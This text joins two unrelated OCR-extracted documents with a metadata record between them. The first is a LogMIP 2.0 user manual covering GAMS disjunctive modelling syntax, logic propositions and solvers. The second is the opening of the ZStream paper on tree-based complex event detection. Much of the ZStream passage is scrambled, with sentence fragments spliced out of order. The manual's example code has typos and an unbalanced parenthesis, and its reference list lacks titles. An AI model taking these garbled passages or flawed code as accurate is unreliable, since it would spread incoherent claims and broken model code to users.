X.UP('5') = 2.0 ; X.UP('9') = 2.0 ; X.UP('10') = 1.0 ; X.UP('14') = 1.0 ; X.UP('17') = 2.0 ; X.UP('19') = 2.0 ; X.UP('21') = 2.0 ; X.UP('25') = 3.0 ; *DEFINITIONS of EQUATIONS Independent of discrete choices MASSBAL1... X('13') =E= X('19') + X('21'); MASSBAL2... X('17') =E= X('9') + X('16') + X('25'); MASSBAL3... X('11') =E= X('12') + X('15'); MASSBAL4... X('3') + X('5') =E= X('6') + X('11'); MASSBAL5... X('6') =E= X('7') + X('8'); MASSBAL6... X('23') =E= X('20') + X('22'); MASSBAL7... X('23') =E= X('14') + X('24'); MASSBAL8... X('1') =E= X('2') + X('4'); SPECS1... X('10') =L= 0.8 * X('17'); SPECS2... X('10') =G= 0.4 * X('17'); SPECS3... X('12') =L= 5.0 * X('14'); SPECS4... X('12') =G= 2.0 * X('14'); * DEFINITION of EQUATIONS allowing flow just IFF the unit EXISTS LOGICAL1... X('2') + X('3') =L= 10. * Y('1'); LOGICAL2... X('4') + X('5') =L= 10. * Y('2'); LOGICAL3... X('9') =L= 10. * Y('3'); LOGICAL4... X('12') + X('14') =L= 10. * Y('4'); LOGICAL5... X('15') =L= 10. * Y('5'); LOGICAL6... X('19') =L= 10. * Y('6'); DEFINITIONS of DISJUNCTION's EQUATIONS INOUT11.. EXP(X('3')) -1. =E= X('2') INOUT14.. CF('1') =E= 5 INOUT12.. X('2') =E= 0 INOUT13.. X('3') =E= 0 INOUT21.. EXP(X('5')/1.2) -1. =E= X('4') INOUT24.. CF('2') =E= 8 INOUT22.. X('4') =E= 0 INOUT23.. X('5') =E= 0 INOUT31.. 1.5 * X('9') + X('10') =E= X('8') INOUT34.. CF('3') =E= 6 INOUT32.. X('9') =E= 0 INOUT41.. 1.25 * (X('12')+X('14')) =E= X('13') INOUT45.. CF('4') =E= 10 INOUT42.. X('12') =E= 0 INOUT43.. X('13') =E= 0 INOUT44.. X('14') =E= 0 INOUT51.. X('15') =E= 2. * X('16') INOUT54.. CF('5') =E= 6 INOUT52.. X('15') =E= 0 INOUT53.. X('16') =E= 0 INOUT61.. EXP(X('20')/1.5) -1. =E= X('19') INOUT64.. CF('6') =E= 7 INOUT62.. X('19') =E= 0 INOUT63.. X('20') =E= 0 INOUT71.. EXP(X('22')) -1. =E= X('21') INOUT74.. CF('7') =E= 4 INOUT72.. X('21') =E= 0 INOUT73.. X('22') =E= 0 INOUT81.. EXP(X('18') -1. =E= X('10') + X('17') INOUT86.. CF('8') =E= 5 INOUT82.. X('10') =E= 0 INOUT83.. X('17') =E= 0 INOUT84.. X('18') =E= 0 INOUT85.. X('25') =E= 0 OBSERUVE .. PROF =E= SUM(J,CF(J)) + SUM(I , X(I)*CV(I)) + 122 LOGIC EQUATION ATMOST1; ATMOST1.. Y('1') xor Y('2'); LOGIC EQUATION ATMOST2; ATMOST2.. Y('4') xor Y('5'); LOGIC EQUATION ATMOST3; ATMOST3.. Y('6') xor Y('7'); LOGIC EQUATION IMP0; IMP0.. Y('1') -> Y('3') or Y('4') or Y('5'); LOGIC EQUATION IMP1; IMP1.. Y('2') -> Y('3') or Y('4') or Y('5'); LOGIC EQUATION IMP2; IMP2.. Y('3') -> Y('8'); LOGIC EQUATION IMP3; IMP3.. Y('3') -> Y('1') or Y('2'); LOGIC EQUATION IMP4; IMP4.. Y('4') -> Y('1') or Y('2'); LOGIC EQUATION IMP5; IMP5.. Y('4') -> Y('6') or Y('7'); LOGIC EQUATION IMP6; IMP6.. Y('5') -> Y('1') or Y('2'); LOGIC EQUATION IMP7; IMP7.. Y('5') -> Y('8'); LOGIC EQUATION IMP8; IMP8.. Y('6') -> Y('1'); LOGIC EQUATION IMP9; IMP9.. Y('7') -> Y('4'); * BEGIN DECLARATIONS AND DEFINITIONS OF DISJUNCTIONS (LOGMIP Section) $SNOECHO > %LM.INFO% DISJUNCTION Y('1') INOUT11 INOUT14 ELSE INOUT12 INOUT13 DISJUNCTION Y('2') INOUT21 INOUT24 ELSE INOUT22 INOUT23 DISJUNCTION Y('3') INOUT31 INOUT34 ELSE INOUT32 DISJUNCTION Y('4') INOUT41 INOUT45 ELSE INOUT42 INOUT43 INOUT44 DISJUNCTION Y('5') INOUT51 INOUT54 ELSE INOUT52 INOUT53 DISJUNCTION Y('6') INOUT61 INOUT64 ELSE INOUT62 INOUT63 DISJUNCTION Y('7') INOUT71 INOUT74 ELSE INOUT72 INOUT73 DISJUNCTION Y('8') INOUT81 INOUT86 ELSE INOUT82 INOUT83 INOUT84 INOUT85 * optional, if not set LOGMIP will find the modeltype suitable MODELTYPE MINLP $OFFEOCH OPTION EMP=LogMIP; OPTION OPTCR=0.0; MODEL EXAMPLE3 / ALL /; SOLVE EXAMPLE3 USING EMP MINIMIZING PROF ; 3. How to write in GAMS a disjunctive model for LogMIP The steps to write a problem into GAMS are the following: a) Write in a GAMS input file (extension .gms) the sets, scalars, parameters, variables, equations and constraints, and any other component necessary for the problem, like if you were writing an algebraic problem. - You must be familiar with GAMS notation to do so. - You must also declare and define in this section the equations and constraints employed in disjunction terms. b) If you are not going to define disjunctions over a domain, write in the same GAMS input file the sentences: $\text{ONECHO} > "\%lm.info\%$ $\text{OFFECHO}$ the dollar sign must be in the 1st column. You must write all three keywords, between these two sentences you must include disjunction definitions according to the rules of LogMIP language which have changed to be included in the EMP Environment. The syntax to write a disjunction is the following: ``` \text{DISJUNCTION \[ \text{chull} [\text{chull eps}] | \text{bigM} [\text{bigM Mvalue}] | \text{indic} ]} [\text{Not}] \text{Var} | * \{ \text{equ} \} \{\text{ELSEIF} [\text{Not}] \text{Var} | * \{\text{equ}\}\} [\text{ELSE} \{\text{equ}\}] ``` According to the GAMS syntax rules the meanings of some symbols are the following: - [ ] enclosed construct are optional - { } enclosed construct may be repeated zero or more times - | or \text{DISJUNCTION} is a mandatory word, after that you have three optional constructs: ``` [chull [chull eps] | bigM [bigM Mvalue] | indic] ``` Which are related to the relaxation and transformation of disjunctions: - chull (convex hull) - bigM (big M relaxation) - indic (indicator constraint) In this version, you can choose among different relaxations for each disjunction. The default option is the convex hull. The convex hull and the bigM relaxations also have additional optional definitions: For the convex hull, the epsilon (eps) parameter is an upper bound value to check for constraint satisfaction (it has a default value). In the case of BigM relaxation, the Mvalue to be defined is the value of the M parameter, which should be large enough to relax the constraint. It also has a default value, but it is important to change to avoid infeasible solutions, for those cases where that value is not appropriate. The next specification is the variable to handle the disjunction term, by means of the following construct: \[ [\text{Not}] \ Var \ | \ * \] You must specify \texttt{Var} or *. The first option is to replace Var with a binary variable name defined in the GAMS section; * is employed when the variable name is assigned by GAMS. **NOTE THAT**: when using the Var option, make sure to write at least a \texttt{dummy equation} that uses them in order to avoid the GAMS compiler take out from the model if they are not used in other equation/constraint of the model. \texttt{[Not]} is the negation of the variable, by means of this sentence the disjunction term is satisfied using the FALSE value, instead of the TRUE value of the variable. \[ \{ \text{equ} \} \] represents a set of constraint names (previously defined in the GAMS section) that must be satisfied if the FIRST disjunction term is selected. For the definition of a several terms disjunction you must also add the following construct: \[ \{ \text{ELSEIF} \ [\text{Not}] \ Var \ | \ * \ \{ \text{equ} \}\} \] where \texttt{ELSEIF} is a mandatory word and then for each term you must specify a binary variable name (\texttt{Var}) or *, and also the constraints set to be satisfied (\{ \texttt{equ} \}) For the definition of a two terms disjunction using just one variable to handle both terms, you must also add the following construct: \[ \{ \text{ELSE} \ \{ \text{equ} \}\] \] where \texttt{ELSE} is a obligatory word, followed by the set of constraint to be satisfied if the term is selected. **NOTE THAT** since one variable is used to handle both terms the construct \texttt{Var} or * is not needed in the ELSE sentence. **Examples:** From Small Example 1 – First version: \[ disjunction \ Y1 \ equat4 \ else \ equat5 \] Corresponds to a two term disjunction having the following syntax rule: \[ \text{DISJUNCTION} \ Var \ \{ \text{equ} \} \ \text{ELSE} \ \{ \text{equ} \} \] From Small Example 1 – Second version: \[ disjunction \ * \ equat4 \ else \ equat5 \] Corresponds to a two term disjunction having the following syntax rule: DISJUNCTION * { equ } ELSE { equ } From Small Example 2: disjunction y1 equat1 equat2 elseif y2 equat3 equat4 Corresponds to a two term disjunction having the syntax rule of a several term, with the following syntax: DISJUNCTION Var { equ } ELSEIF Var { equ } c) Defining disjunctions over a domain The definition of a disjunction over a domain is performed using the put writing facilities of GAMS (for more references about this topic read chapter “The Put Writing Facility” in GAMS User’s Guide). The domain expansion is made via FILE and PUT sentences in combination with LOOP and/or WHILE GAMS sentences. To control disjunction’s domain, you must use the dollar sign ($) (for more references read section “The Dollar Condition” in GAMS User’s Guide). In the following paragraphs, the definition of disjunctions over a domain is illustrated using some examples. The following sentences are extracted from Third version of Small Example 1 in page 6 of this manual: ```gams 1 file lg / '%lm.info%' / 2 put lg '* problem %gams.i%' ; 3 loop(lt(jj,j) $$(ord(jj) <> ord(j)) , 4 put /'disjunction {Y(j,jj) seq(jj,j) else seq(jj,j)}; 5 putclose; ``` The first line defines a FILE where lg is an internal name for GAMS to refer to an external file, the name of the external file is %lm.info% which is the default name used for LogMIP info file. The second line (put lg) writes on the file a comment (* problem %gams.i%). The third line is a loop control sentence, the controlling domain is given by lt(jj,j), meaning that the loop will be executed over each member of the subset lt(jj,j) but just for those where the order of j is different to the order of jj, which is specified by the sentence $$(ord(jj) <> ord(j)). Line 4 writes in file lg a sentence containing the disjunction definition, suppose j is defined over domain 1,2 and 3, and that the order of j is 1 and 2, the consequence of executing line 4, the FILE lg will have the following line written: ``` Disjunction Y('1', '2') seq ('1', '2') else seq('2', '1') ``` In the next iteration of the loop sentence, the order of j changes to 3, then it writes a new line in the file, ``` Disjunction Y('1', '3') seq ('1', '3') else seq('3', '1') ``` This process continue until each one the elements of lt(jj,j) is covered Please note that a new line character (/) is inserted in line 4; if that character is not placed in the sentence, the previous lines would be written one next to the other, in this way: ``` Disjunction Y('1', '2') seq ('1', '2') else seq('2', '1') Disjunction Y('1', '3') seq ('1', '3') else seq('3', '1') ``` So, to avoid errors writing long lines it is important to include the line feed sentence (/) at the end of each line. The next example corresponds to a mid-term contracts signature with suppliers, for more references about this problem visit www.minlp.org in the GDP problems section. The following sentences are extracted from that example. 1 file logMIP /*%LM.info*/; 2 put logmip '* input=%gams.input' 3 put /'default BigM'/ 4 5 loop((j,t)$((ord(j)=1 or ord(j)=6)) 6 put / disjunction * ubb1(j,t) costbct(j,t) 7 ' elseif *' ubb2(j,t) costbct2(j,t) 8 ' elseif *' ubbno(j,t) costbno(j,t) ; 9 ); 10 11 loop((j,t)$((ord(j)=1 or ord(j)=6)) 12 put /'disjunction */ lb1(j,'1') costplct1(j,'1') 13 ' elseif *' lb21(j,'1') lb22(j,'2') costplct21(j,'1') costplct2(j,'2') 14 ' elseif *' lb31(j,'1') lb32(j,'2') lb33(j,'3') costplct31(j,'1') 15 costplct32(j,'2') costplct33(j,'3') 16 ' elseif *' lengno1(j,'1') lengno2(j,'2') lengno3(j,'3') costno1(j,'1') 17 costno2(j,'2') costno3(j,'3') ; 18 ); In line 1, it can be seen that the GAMS internal name of the file in this case is LogMIP. The third line define that this problem is solved using the bigM relaxation. The first disjunction definition starts in line 5, it is defined over the domain of sets j and t. Set j is controlled by the elements of order 1, 4 and 6. The disjunction is expanded for the complete set t. Suppose that the domain of t is defined over 1 and 2, then the loop sentence posed from lines 5 to 9 writes in the file the following sentences: \[ \text{disjunction } * \text{ ubb1('1', '1')} \text{ costbct1('1', '1')} \text{ elseif * ubb2('1', '1')} \text{ costbct2('1', '1')} \text{ elseif * ubbno('1', '1')} \text{ costbno('1', '1')} ; \] The second disjunction definition starts in line 11, although it is also delimited by sets j and t, in this case only j is controlled in the loop sentence, the elements of set t are explicitly included in the constraints enumeration inside the disjunctions. Again the lines that this sentence writes in the file are the following: \[ \text{disjunction } * \text{ lb1('1', '1')} \text{ costplct1('1', '1')} \text{ elseif * lb21('1', '1')} \text{ lb22('1', '2')} \text{ costplct21('1', '1')} \text{ costplct22('1', '2')} \\ \text{ elseif * lb31('1', '1')} \text{ lb32('1', '2')} \text{ lb33('1', '3')} \text{ costplct31('1', '1')} \text{ costplct32('1', '2')} \text{ costplct33('1', '3')} \text{ elseif * lengno1('1', '1')} \text{ lengno2('1', '2')} \text{ lengno3('1', '3')} \text{ costno1('1', '1')} \text{ costno2('1', '2')} \text{ costno3('1', '3')} ; \] 3.1. Controlling the disjunction’s and constraint domains. The domain where disjunctions and constraints must be satisfied must be controlled via a loop sentence in combination with dollar operator ($), this operator must be used in the same way than in GAMS constraints definition. 3.2. Use of a DUMMY equation Although it is not mandatory, we recommend to write a dummy equation into the GAMS section for the binary variables that handle disjunction terms (disjunction conditions) previously defined in the GAMS section. The purpose of this dummy equation is to avoid that GAMS compiler eliminate them from the model (and from the matrix). It occurs when some or all variables are not used in other constraints in the model. Suppose the following variables handling disjunction’s terms defined in GAMS section: Binary variables Y(J); If some or all variables of Y are not included in any equation or constraint defined in GAMS section, they will be eliminated from the model, and LogMIP compiler will show an error even when they handle disjunction terms. To avoid that, you must write the following constraint: DUMMY.. SUM(J, Y(J)) =G= 0; which should be always satisfied. Another example: Binary variables y, w, z; DUMMY .. y + w + z =G= 0; NOTE THAT this is not needed when you use the * option (default variable names) to handle disjunction terms. 4. Logic Propositions Logic propositions are used to pose relationships between the Boolean (Binary) variables handling the disjunctive terms. Logic Propositions must be declared and defined in the GAMS Section. 4.1. Declaration Sentence LOGIC EQUATION name LOGIC EQUATION is a reserved word to specify a logic proposition, name must be provided by the user, it must follow the rules of any constraint name. 4.2. Definition Sentence The definition of a LOGIC EQUATION is similar to any other equation in the GAMS model (see Chapter 8. Equations in GAMS Users Guide), with the difference that is must include only the following operators: <table> <thead> <tr> <th>Operator Symbol</th> <th>Operation</th> </tr> </thead> <tbody> <tr> <td>-&gt;</td> <td>Implication</td> </tr> <tr> <td>&lt;-&gt;</td> <td>equivalence</td> </tr> <tr> <td>not</td> <td>negation</td> </tr> <tr> <td>and</td> <td>logical and</td> </tr> <tr> <td>or</td> <td>logical or</td> </tr> <tr> <td>xor</td> <td>exclusive or</td> </tr> </tbody> </table> Examples: Declaration Sentence \[ \text{LOGIC EQUATION ATMOST1, ATMOST2, ATMOST3, IMP0, IMP1, IMP2;} \] Definition Sentences \[ \begin{align*} \text{ATMOST1.. } & Y('1') \text{ xor } Y('2'); \\ \text{ATMOST2.. } & Y('4') \text{ xor } Y('5'); \\ \text{ATMOST3.. } & Y('6') \text{ xor } Y('7'); \\ \text{IMP0.. } & Y('1') \rightarrow Y('3') \text{ or } Y('4') \text{ or } Y('5'); \\ \text{IMP1.. } & Y('2') \rightarrow Y('3') \text{ or } Y('4') \text{ or } Y('5'); \\ \text{IMP2.. } & Y('3') \rightarrow Y('8') \end{align*} \] 5. SOLVERS ✓ LogMIP can solve linear/nonlinear disjunctive hybrid models that follow the formulation showed in section 2 of this manual. Disjunctive models are those where discrete decisions are written only in the form of disjunctions, while hybrid models involve both disjunctions and mixed-integer constraints. According to the user model type (linear or non-linear), by default, LogMIP decides the solver to run. The user can also specify the model type by including the following sentence in the LogMIP section: \[ \text{modeltype [MIP|MINLP]} \] 5.1. Solution algorithm for linear problems Figure 1 shows how the solution for linear hybrid/disjunctive models is driven. ![Fig. 1: solution algorithms for linear models](image-url) The disjunctions defined in the model are transformed into mixed integer formulations by using one of the relaxations proposed: BigM or convex hull or indicators constraints. The complete set of disjunctions can be transformed by one of those relaxations, or you can choose a different one for each disjunction in the model. Then, the problem is converted into a Mixed Integer Program (MIP) which is later solved by a Branch and Bound algorithm. References about the relaxations can be found in Balas (1979), Vecchietti and Grossmann (2002). The default relaxation is the convex hull. You can change it by introducing in the LogMIP section the following sentence: **DEFAULT Big-M** By means of this sentence disjunctions are relaxed using the Big-M relaxation. Since LogMIP 2.0 belongs to the EMP environment, to solve the problem you must write in the GAMS input file the following two sentences: ```plaintext OPTION EMP=LOGMIP; SOLVE modelname USING EMP [MINIMIZING | MAXIMIZING] variablename ``` ### 5.2. Solution algorithms for NON-Linear problems Figure 2 shows the flowchart to solve non-linear hybrid/disjunctive models. ![Flowchart](image.png) The disjunctions defined in the model are transformed into mixed integer formulations by using one of the relaxations proposed: BigM or convex hull for non-linear problems. The complete set of disjunctions can be transformed by one of those relaxations, or you can choose a different one for each disjunction in the model. Then the problem is converted into a Mixed Integer Non-Linear Program which is later solved by a MINLP solver such that: SBB, DICOPT, BARON, AlphaECP, etc. Logic Based Outer Approximation algorithm (Turkay and Grossmann, 1996a) does not work anymore for this LogMIP version. A new system is developed, it will be ready for a next release. The default relaxation is the convex hull. You can change it by introducing in the LogMIP section the following sentence: ``` DEFAULT Big-M ``` By means of this sentence disjunctions are relaxed using the Big-M relaxation. Since LogMIP 2.0 belongs to the EMP environment, to solve the problem you must write in the GAMS input file the following two sentences: ``` OPTION EMP=LOGMIP; SOLVE modelname USING EMP [MINIMIZING | MAXIMIZING] variblename ``` 6. Recommendations and Limitations. - Write the GAMS file in a single way following a sequence: declare SETS, VARIABLES and EQUATIONS at the beginning of the file, then pose the constraint, objective function and disjunctions definitions. Finally write the options, model and solution sentences. - Although GAMS is flexible about the declarations of the equation and variable domains (you can declare them or not), it is strongly recommended to explicitly declare all domains for every variable and constraint defined in the model. - If possible, write your entire model in a single file, do not use the INCLUDE sentence to import an external file in the model. - Note that constraints defined in the disjunctions are related with your declaration and definitions in the GAMS section. In this sense you cannot include in the disjunction the name of a constraint not previously defined. This is especially important for constraints defined in the GAMS section over a domain controlled by the dollar sign ($). Disjunctive constraints must be in concordance with those defined in GAMS section. - A similar advice is necessary for variables handling disjunction´s terms. 7. References. The following is a list of articles where you can get a more complete material about disjunctive/hybrid models and the algorithms to solve them. **Balas, E.** **Balas, E.** Balas, E. Brooke A., Kendrick D. and Meeraus A. Gil J.J. and Vecchietti A. Gil J.J. and Vecchietti A. Grossmann I.E. Lee S. and Grossmann I.E. Lee, S. and I.E. Grossman, Raman R. and Grossmann I.E. Sawaya, N.W. and Grossmann I.E. Sawaya, N.W. and Grossmann I.E. Turkay M. and Grossmann I.E. Vecchietti A. and Grossmann I.E. Vecchietti A. and Grossmann I.E. Vecchietti, A., S. Lee and I.E. Grossmann Vecchietti A, and Grossman I.E.,
{"Source-Url": "http://www.logmip.ceride.gov.ar/files/pdfs/newUserManual.pdf", "len_cl100k_base": 11817, "olmocr-version": "0.1.48", "pdf-total-pages": 22, "total-fallback-pages": 0, "total-input-tokens": 84847, "total-output-tokens": 14303, "length": "2e13", "weborganizer": {"__label__adult": 0.0003437995910644531, "__label__art_design": 0.00067901611328125, "__label__crime_law": 0.0005040168762207031, "__label__education_jobs": 0.0033130645751953125, "__label__entertainment": 0.0001214146614074707, "__label__fashion_beauty": 0.0002377033233642578, "__label__finance_business": 0.0011234283447265625, "__label__food_dining": 0.0005331039428710938, "__label__games": 0.0011692047119140625, "__label__hardware": 0.0011835098266601562, "__label__health": 0.0006136894226074219, "__label__history": 0.0003817081451416016, "__label__home_hobbies": 0.0002532005310058594, "__label__industrial": 0.0022182464599609375, "__label__literature": 0.0002989768981933594, "__label__politics": 0.0003631114959716797, "__label__religion": 0.0004968643188476562, "__label__science_tech": 0.1910400390625, "__label__social_life": 0.00013649463653564453, "__label__software": 0.025909423828125, "__label__software_dev": 0.767578125, "__label__sports_fitness": 0.0003898143768310547, "__label__transportation": 0.0007338523864746094, "__label__travel": 0.00022721290588378904}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 39087, 0.06299]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 39087, 0.59585]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 39087, 0.75037]], "google_gemma-3-12b-it_contains_pii": [[0, 90, false], [90, 1789, null], [1789, 3691, null], [3691, 5198, null], [5198, 6780, null], [6780, 8568, null], [8568, 10033, null], [10033, 11749, null], [11749, 12305, null], [12305, 14069, null], [14069, 16822, null], [16822, 19388, null], [19388, 21305, null], [21305, 23848, null], [23848, 26567, null], [26567, 29072, null], [29072, 31401, null], [31401, 32673, null], [32673, 34314, null], [34314, 36579, null], [36579, 38600, null], [38600, 39087, null]], "google_gemma-3-12b-it_is_public_document": [[0, 90, true], [90, 1789, null], [1789, 3691, null], [3691, 5198, null], [5198, 6780, null], [6780, 8568, null], [8568, 10033, null], [10033, 11749, null], [11749, 12305, null], [12305, 14069, null], [14069, 16822, null], [16822, 19388, null], [19388, 21305, null], [21305, 23848, null], [23848, 26567, null], [26567, 29072, null], [29072, 31401, null], [31401, 32673, null], [32673, 34314, null], [34314, 36579, null], [36579, 38600, null], [38600, 39087, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 39087, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 39087, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 39087, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 39087, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 39087, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 39087, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 39087, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 39087, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 39087, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 39087, null]], "pdf_page_numbers": [[0, 90, 1], [90, 1789, 2], [1789, 3691, 3], [3691, 5198, 4], [5198, 6780, 5], [6780, 8568, 6], [8568, 10033, 7], [10033, 11749, 8], [11749, 12305, 9], [12305, 14069, 10], [14069, 16822, 11], [16822, 19388, 12], [19388, 21305, 13], [21305, 23848, 14], [23848, 26567, 15], [26567, 29072, 16], [29072, 31401, 17], [31401, 32673, 18], [32673, 34314, 19], [34314, 36579, 20], [36579, 38600, 21], [38600, 39087, 22]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 39087, 0.01801]]}
olmocr_science_pdfs
2024-11-23
2024-11-23
1aca3b23a0841acb223a3ae4fca1d1fb4868b7bb
ZStream: A cost-based query processor for adaptively detecting composite events Citation As Published http://dx.doi.org/10.1145/1559845.1559867 Publisher Association for Computing Machinery (ACM) Version Author’s final manuscript Citable link http://hdl.handle.net/1721.1/72190 Terms of Use Creative Commons Attribution-Noncommercial-Share Alike 3.0 Detailed Terms http://creativecommons.org/licenses/by-nc-sa/3.0/ ZStream: A Cost-based Query Processor for Adaptively Detecting Composite Events Yuan Mei MIT CSAIL Cambridge, MA, USA meiyuan@csail.mit.edu Samuel Madden MIT CSAIL Cambridge, MA, USA madden@csail.mit.edu ABSTRACT Composite (or Complex) event processing (CEP) systems search sequences of incoming events for occurrences of user-specified event patterns. Recently, they have gained more attention in a variety of areas due to their powerful and expressive query language and performance potential. Sequentiality (temporal ordering) is the primary way in which CEP systems relate events to each other. In this paper, we present a CEP system called ZStream to efficiently process such sequential patterns. Besides simple sequential patterns, ZStream is also able to detect other patterns, including conjunction, disjunction, negation and Kleene closure. Unlike most recently proposed CEP systems, which use non-deterministic finite automata (NFA’s) to detect patterns, ZStream uses tree-based query plans for both the logical and physical representation of query patterns. By carefully designing the underlying infrastructure and algorithms, ZStream is able to unify the evaluation of sequence, conjunction, disjunction, negation, and Kleene closure as variants of the join operator. Under this framework, a single pattern in ZStream may have several equivalent physical tree plans, with different evaluation costs. We propose a cost model to estimate the computation costs of a plan. We show that our cost model can accurately capture the actual runtime behavior of a plan, and that choosing the optimal plan can result in a factor of four or more speedup versus an NFA based approach. Based on this cost model and using a simple set of statistics about operator selectivity and data rates, ZStream is able to adaptively and seamlessly adjust the order in which it detects patterns on the fly. Finally, we describe a dynamic programming algorithm used in our cost model to efficiently search for an optimal query plan for a given pattern. Categories and Subject Descriptors H.4.m [Information Systems Applications]: Miscellaneous; D.2.8 [Software Engineering]: Metrics—complexity measures, performance measures Permission to make digital or hard copies of all or part of this work for personal or classroom use is granted without fee provided that copies are not made or distributed for profit or commercial advantage and that copies bear this notice and the full citation on the first page. To copy otherwise, to republish, to post on servers or to redistribute to lists, requires prior specific permission and/or a fee. SIGMOD ’09, June 29–July 2, 2009, Providence, Rhode Island, USA. Copyright 2009 ACM 978-1-60558-551-2/09/06 ...$5.00. Figure 1: An example NFA for processing the sequential pattern A followed by B followed by C General Terms Algorithms, Design, Experimentation, Performance Keywords Complex Event Processing, Streaming, Optimization, Algorithm 1. INTRODUCTION Composite (or Complex) event processing (CEP) systems search sequences of incoming events for occurrences of user-specified event patterns. They have become more popular in a number of areas due to their powerful and expressive query language and performance potential [1]. Sequential queries (based on temporal ordering) are the primary way in which CEP systems relate events to each other. Examples of sequential queries include tracing a car’s movement in a predefined area (where a car moves through a series of places), detecting anomalies in stock prices (where the rise and fall of the price of some stocks is monitored over time), and detecting intrusion in network monitoring (where a specific sequence of malicious activities is detected). However, purely sequential queries are not enough to express many real world patterns, which also involve conjunction (e.g., concurrent events), disjunction (e.g., a choice between two options) and negation, all of which make the matching problem more complex. Currently, non-deterministic finite automata (NFA) are the most commonly used method for evaluating CEP queries [7, 8, 15]. As shown in Figure 1, an NFA represents a query pattern as a series of states that must be detected. A pattern is said to be matched when the NFA transitions into a final state. However, the previously proposed NFA-based approaches have three limitations that we seek to address in this work: Fixed Order of Evaluation. NFA’s naturally express patterns as a series of state transitions. Hence, current NFA-based approaches impose a fixed evaluation order determined by this state transition diagram. For example, the NFA in Figure 1 starts at state 1, transits to state 2 We develop a tree-based query plan structure for CEP. We show that ZStream is able to unify the evaluation of negation queries by almost an order of magnitude. Our goal in this paper is to not demonstrate that an NFA-based approach is inherently inferior to a tree-based query approach, but to show that: 1. by carefully designing the underlying infrastructure and algorithms, a tree-based approach can process most CEP queries very efficiently, and, 2. without some notion of an optimal plan, as well as statistics and a cost model to estimate that optimal plan, any approach that uses a fixed evaluation order (whether based on NFA’s or trees) is suboptimal. The rest of the paper is organized as follows: Section 2 and 3 introduces related work and language respectively. Section 4 presents the system architecture and operator algorithms; Section 5 discusses the cost model and optimization; Section 6 shows evaluation results. 2. RELATED WORK CEP systems first appeared as trigger detection systems in active databases [5, 6, 9, 10] to meet the requirements of active functionality that are not supported by traditional databases. Examples of such work include HiPAC [6], Ode [10], SAMOS [9] and Sentinel [5]. FSA-based systems, such like HiPAC and Ode, have difficulty supporting concurrent events, because transitions in FSAs inherently incorporate some orders between states. Petri Nets-based systems such like SAMOS are able to support concurrency, but such networks are very complex to express and evaluate. Like ZStream, Sentinel evaluates its event language using event trees, but it arbitrarily constructs a physical tree plan for evaluation rather than searching for an optimal plan, which, as we show, can lead to suboptimal plans. Other research has tried to make use of string-based matching algorithms [13] and scalable regular expressions [12] to evaluate composite event patterns. These methods only work efficiently for strictly consecutive patterns, limiting the expressive capability of the pattern matching language. In addition, they typically focus on searching for common sub-expressions amongst multiple patterns rather than searching for an optimal execution plan for a single pattern. To support both composite event pattern detection and high rate incoming events, SASE [4, 15], a high performance CEP system, was recently proposed. It achieves good performance through a variety of optimizations. SASE is, however, NFA-based, inheriting the limitations of the NFA-based model described in Section 1. The Cayuga [7] CEP system is another recently proposed CEP system. Since it is developed from a pub/sub system, it is also focused on common sub-expressions searching amongst multiple patterns. In addition, Cayuga is also NFA-based; hence it too suffers from the limitations of the NFA-based model. Recently, commercial streaming companies like Stream- that finds a stock with its trading price first x the following Google suppose the composite event results generated from Query 1 mantics of composite event assembly unclear. For example, ignore the event duration. This assumption makes the se- single point in time (the end-timestamp for instance), and Case we refer to a single timestamp. Some CEP systems the left operand is followed by the right operand. operator that sequentially connects event classes, meaning volume,ts) ons. The stock stream has the schema from the pattern query. The RETURN clause defines the expected output stream event attributes; Time Constraints via different event operators; Value Constraints tern to be matched by connecting event classes together are predefined single occurrences of interest that can not be split into any smaller events. Composite events are detected by the CEP system from a collection of primitive and/or other composite events. Single-class predicates are predicates that involve only one event class and multi- class predicates are predicates that involve more than one event class. Primitive events arrive into the CEP system from various external event sources, while composite events are internally generated by the CEP system itself. CEP queries have the following format (as in [15]): PATTERN Composite Event Expressions WHERE Value Constraints WITHIN Time Constraints RETURN Output Expression The Composite Event Expressions describe an event pat- tern to be matched by connecting event classes together via different event operators; Value Constraints define the context for the composite events by imposing predicates on event attributes; Time Constraints describe the time win- dow during which events that match the pattern must occur. The RETURN clause defines the expected output stream from the pattern query. Query 1. Sequence Pattern PATTERN T1; T2; T3 WHERE T1.name = T3.name AND T2.name = 'Google' AND T1.price > (1 + x%) * T2.price AND T3.price < (1 - y%) * T2.price WITHIN 10 secs RETURN T1, T2, T3 Query 1 shows an example stock market monitoring query that finds a stock with its trading price first x% higher than the following Google tick, and then y% lower within 10 se- conds. The stock stream has the schema (id, name, price, volume,ts). The symbol ";" in the PATTERN clause is an operator that sequentially connects event classes, meaning the left operand is followed by the right operand. In our data model, each event is associated with a start- timestamp and an end-timestamp. For primitive events, the start-timestamp and end-timestamp are the same, in which case we refer to a single timestamp. Some CEP systems make the assumption that a composite event occurs at a single point in time (the end-timestamp for instance), and ignore the event duration. This assumption makes the se- manics of composite event assembly unclear. For example, suppose the composite event results generated from Query 1 are further used as inputs to another sequential pattern "A; B WITHIN tw". Then simply using the end-timestamps (to satisfy the new pattern’s time window tw) may result in the total elapsed time between the start of A and the end of B exceeding the time bound tw. In other words, simply matching on end-timestamp can result in composite events with an arbitrarily long occurrence duration. Hence, in ZStream, we require that composite events have a total duration less than the time 